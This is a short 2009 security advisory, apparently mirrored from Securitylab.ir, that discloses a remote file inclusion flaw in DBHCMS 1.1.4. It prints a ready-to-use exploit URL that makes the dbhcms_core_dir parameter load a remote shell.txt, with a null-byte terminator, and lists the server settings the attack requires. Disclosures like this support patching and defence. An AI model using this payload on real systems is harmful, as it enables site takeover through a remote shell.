Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22996
HistoryDec 29, 2009 - 12:00 a.m.

DBHCMS Web Content Management System v1.1.4 RFI Vulnerability

2009-12-2900:00:00
vulners.com
30

######################### Securitylab.ir ########################

Application Info:

Name: DBHCMS Web Content Management System

Version: 1.1.4

Download: :(

#################################################################

Discoverd By: Securitylab.ir

Website: http://Securitylab.ir

Contacts: admin[at]securitylab.ir & [email protected]

#################################################################

Vulnerability Info:

Type: RFI (Remote File Inclusion)

Risk: High

#===========================================================

http://site.com/index.php?dbhcms_core_dir=http://site.com/shell.txt%00

Need: register_globals = ON and allow_url_include = ON

#===========================================================

Securitylab Security Research Team

###################################################################